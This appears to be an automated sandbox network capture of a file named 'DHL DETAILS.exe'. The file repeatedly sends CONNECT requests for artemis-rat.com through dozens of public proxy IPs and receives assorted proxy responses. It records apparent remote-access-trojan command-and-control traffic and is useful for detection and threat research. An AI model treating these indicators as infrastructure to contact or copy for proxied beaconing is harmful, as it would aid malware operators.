Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1055	192.168.2.5	53155	185.220.226.235	808	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.544670105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1056	192.168.2.5	53229	119.28.4.112	9999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.545316935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1057	192.168.2.5	53295	192.154.244.92	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.551070929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1058	192.168.2.5	53270	44.190.9.65	48100	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.555696964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1059	192.168.2.5	53205	14.103.24.20	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.565795898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1060	192.168.2.5	52625	162.214.225.223	63452	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.571980000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.676820993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1061	192.168.2.5	50925	8.213.128.90	3129	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.577318907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.912084103 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1062	192.168.2.5	53210	221.6.139.190	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.589060068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.944087982 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1063	192.168.2.5	53259	159.223.71.71	52542	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.601181030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.333204985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.536539078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.724096060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.833235025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.864337921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1064	192.168.2.5	52662	54.152.3.36	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.606316090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.826271057 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:16 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:16.890763998 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 97 e6 ae 88 5f c7 a7 17 82 30 d5 f3 a2 7f 70 0e 1b 69 77 0c 28 28 1d f3 36 6d ec de a1 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR_0piw((6m*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:17.109510899 CET	536	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 fc 42 bc 37 49 e1 95 d6 7d 45 87 67 e3 6c f6 fc 3a d5 b5 9a e0 ec af 35 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9B7I}Egl:5DOWNGRD0000H010Uartemis-rat.com0240309120649Z260309120649Z010Uartemis-rat.com0"0H0)K].S*kC
Mar 9, 2024 13:14:17.109636068 CET	536	IN	Data Raw: dc 87 a6 79 77 13 1b 72 1b 36 4c c0 5f 8d 99 ab 97 15 34 b2 fb 3d d9 eb de f8 f6 4f 8c e7 65 00 24 f8 e7 69 ff a2 cf 68 c7 c6 e8 f6 d3 90 a6 61 e1 b5 f8 d8 0d b3 9d 08 50 9a a5 6c 80 b3 79 5b 15 3f 26 42 dd 4f 6d f8 63 6e c7 ee 4d e7 01 5a b0 3b Data Ascii: ywr6L_4=Oe$ihaPly[?&BOmcnMZ;oeB9yY:kPHwNOCGJ{B;,q@w 'v?\fUFL"XF+[-gzHw[&&^eK~+#(P>x,(
Mar 9, 2024 13:14:17.109872103 CET	7	IN	Data Raw: 03 00 04 0e 00 00 00 Data Ascii:
Mar 9, 2024 13:14:17.274828911 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 0a fd 15 2e e6 f9 67 92 f1 f3 8a a7 c5 e3 67 bd f2 29 ee e9 37 6d de 0e a6 3d f9 bb b8 4e 31 12 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 6b 0b cd bb 2a 95 b7 46 1c c8 e0 1b d5 4b 60 5b 8f 13 8c b9 25 Data Ascii: %! .gg)7m=N1(k*FK`[%^Jq6PO
Mar 9, 2024 13:14:17.490530968 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 5d a6 df ee cc a2 60 0c 4e 8f 70 7f 13 2b ed f0 69 5f 88 52 6c 52 06 f4 08 46 e9 04 14 f6 8e 3d 5a ee 92 97 45 8e d5 5f Data Ascii: (]`Np+i_RlRF=ZE_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1065	192.168.2.5	53301	192.111.134.10	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.606316090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1066	192.168.2.5	51074	51.15.254.129	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.635231972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.723897934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.723901987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.723790884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1067	192.168.2.5	53243	102.223.20.217	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.637934923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.019881964 CET	493	IN	HTTP/1.1 302 Found Date: Sat, 09 Mar 2024 12:14:16 GMT Server: Apache/2.4.52 (Ubuntu) Location: https://repository.gij.edu.gh Content-Length: 295 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 70 6f 73 69 74 6f 72 79 2e 67 69 6a 2e 65 64 75 2e 67 68 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://repository.gij.edu.gh">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1068	192.168.2.5	51124	91.121.106.55	4444	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.645312071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.118191004 CET	132	IN	HTTP/1.1 503 Too many open connections Content-Type: text/plain Connection: close Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a Data Ascii: Maximum number of open connections reached.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1069	192.168.2.5	53291	93.190.142.57	31280	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.660715103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.955491066 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1070	192.168.2.5	53272	43.131.246.77	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.688355923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1071	192.168.2.5	53271	45.11.95.166	6002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.688606977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.053407907 CET	228	IN	HTTP/1.0 502 Bad Gateway Connection: close Content-type: text/html; charset=utf-8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1072	192.168.2.5	53283	94.177.106.178	2324	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.690614939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1073	192.168.2.5	53288	212.127.93.185	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.690682888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1074	192.168.2.5	53313	94.131.64.94	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.690820932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1075	192.168.2.5	53184	218.57.210.186	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.703100920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.723849058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.091188908 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 11:56:37 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1076	192.168.2.5	51163	51.75.126.150	34144	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.709964991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.780133009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1077	192.168.2.5	51070	94.45.74.60	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.715390921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1078	192.168.2.5	53262	8.209.255.13	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.718981981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.676876068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.769740105 CET	38	IN	HTTP/1.1 200 OK content-length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1079	192.168.2.5	53282	115.239.234.43	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.737147093 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:17.088854074 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1080	192.168.2.5	52886	164.92.86.113	50564	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.747600079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.780145884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1081	192.168.2.5	53300	177.12.118.160	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.748718977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.074008942 CET	340	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.2 Date: Sat, 09 Mar 2024 12:14:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1082	192.168.2.5	53303	121.128.194.154	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
